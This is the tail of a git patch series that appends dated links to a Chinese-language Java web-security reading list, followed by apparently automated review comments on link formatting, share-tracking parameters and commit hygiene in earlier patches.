"b/java\346\227\245\345\270\270/Readme.md" @@ -318,4 +318,4 @@ + 2023/06/05 [ImageMagick 参数注入](https://github.com/ImageMagick/ImageMagick/issues/6338) + 2023/06/05 [为什么我们需要收集URL?](https://mp.weixin.qq.com/s/nhU9gbRot3X8D_1AvkirUA) + 2023/06/06 [justCTF2023-AWS Cognito认证服务的安全隐患](https://hpdoger.cn/2023/06/05/title:%20justCTF2023-AWS%20Cognito%E8%AE%A4%E8%AF%81%E6%9C%8D%E5%8A%A1%E7%9A%84%E5%AE%89%E5%85%A8%E9%9A%90%E6%82%A3/) **学习** -+ 2023/06/16 [NGINX缓存原理及源码分析(一)](https://zhuanlan.zhihu.com/p/420983450) ++ 2023/06/16 [NGINX缓存原理及源码分析(一)](https://zhuanlan.zhihu.com/p/420983450) [cdn原理分析-本地搭建cdn模拟访问过程](https://mp.weixin.qq.com/s/u-VWrrdlkRzKs7u04EPV-g) From 3d3b9f1907662f851cf7cd698762795d43368502 Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 2 Jul 2023 22:34:14 +0800 Subject: [PATCH 256/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 30e3f6b..c6adbcc 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -319,3 +319,4 @@ + 2023/06/05 [为什么我们需要收集URL?](https://mp.weixin.qq.com/s/nhU9gbRot3X8D_1AvkirUA) + 2023/06/06 [justCTF2023-AWS Cognito认证服务的安全隐患](https://hpdoger.cn/2023/06/05/title:%20justCTF2023-AWS%20Cognito%E8%AE%A4%E8%AF%81%E6%9C%8D%E5%8A%A1%E7%9A%84%E5%AE%89%E5%85%A8%E9%9A%90%E6%82%A3/) **学习** + 2023/06/16 [NGINX缓存原理及源码分析(一)](https://zhuanlan.zhihu.com/p/420983450) [cdn原理分析-本地搭建cdn模拟访问过程](https://mp.weixin.qq.com/s/u-VWrrdlkRzKs7u04EPV-g) ++ 2023/07/02 [一种基于规则的 JavaWeb 回显方案](https://mp.weixin.qq.com/s/hIPz0LEk_OW_IpUbfKBYMg) From f66350052c3674c4c090cb24524b0559af905e33 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 11 Jul 2023 15:47:41 +0800 Subject: [PATCH 257/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index c6adbcc..a8914bd 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -320,3 +320,4 @@ + 2023/06/06 [justCTF2023-AWS Cognito认证服务的安全隐患](https://hpdoger.cn/2023/06/05/title:%20justCTF2023-AWS%20Cognito%E8%AE%A4%E8%AF%81%E6%9C%8D%E5%8A%A1%E7%9A%84%E5%AE%89%E5%85%A8%E9%9A%90%E6%82%A3/) **学习** + 2023/06/16 [NGINX缓存原理及源码分析(一)](https://zhuanlan.zhihu.com/p/420983450) [cdn原理分析-本地搭建cdn模拟访问过程](https://mp.weixin.qq.com/s/u-VWrrdlkRzKs7u04EPV-g) + 2023/07/02 [一种基于规则的 JavaWeb 回显方案](https://mp.weixin.qq.com/s/hIPz0LEk_OW_IpUbfKBYMg) ++ 2023/07/11 [企业微信密钥泄露利用小案例](https://mp.weixin.qq.com/s/mptsykGJHmRC87dYqFFqMw)
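Review bot: In PATCH 232/257, the unchanged context line for the Spring Boot XSS/SQL injection entry has its URL pasted twice back to back (`...yhMICjghttps://mp.weixin.qq.com/s/...`), so the link target is malformed. The same line is carried as context through PATCH 233 and 234. Fix it in this block by keeping a single `https://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjg`.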
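Review bot: In PATCH 233/257, the comment after the added redis/shiro link is plain text, while the neighbouring entries wrap their annotations in `**...**`. Bold it the same way so the annotation is distinguishable from the link title when the list is rendered.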
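Review bot: In PATCH 234/257, the added Flink link keeps the WeChat share-tracking query string (`srcid`, `scene`, `sharer_sharetime`, `sharer_shareid`, `chksm`, `mpshare`). The same `sharer_shareid` value appears again in the links added by PATCH 242 and PATCH 245, so the public list ties every such link to one sharing account and timestamp. Strip the parameters that are not needed to resolve the article, or use the short `https://mp.weixin.qq.com/s/<id>` form that the other entries already use.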
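Review bot: In PATCH 239/257, the `SQL注入&预编译` line is removed and re-added with text that appears identical as shown, so the difference is presumably trailing whitespace or a missing newline at end of file. End the file with a newline so that appending one entry does not rewrite the previous line; this also keeps blame on the original commit.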
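Review bot: In PATCH 242/257, the date on the `SSRF payloads` entry is changed from 2023/04/03 to 2023/04/02 in the same commit that adds the DFA entry, and the subject `Update Readme.md` mentions neither. Split the date correction into its own commit or say so in the message. The new DFA link also carries the share-tracking parameters, which should be trimmed.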
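Review bot: In PATCH 243/257, the link text `java-exploitation-restrictions-in` is the truncated URL slug rather than the article's title. Use the post's real title as the link text, as the other entries do, so the list stays searchable and readable without following the link.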
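Review bot: In PATCH 246/257, the new `shell/Groovy/readme.md` is a title line plus a bare URL, with no indication of what the linked article covers or why it sits under `shell/`. Use the `[title](url)` form from the `java日常` list and add a one-line description, so the file is useful if the external link goes away.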
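Review bot: In PATCH 255/257, the CDN article link is appended to the end of the existing NGINX cache bullet with only a space between the two links, so one dated entry now holds two unrelated targets. Put the second link on its own `+ 2023/06/16 [...]` line, or add a separator and a short note explaining that the two articles are meant to be read together.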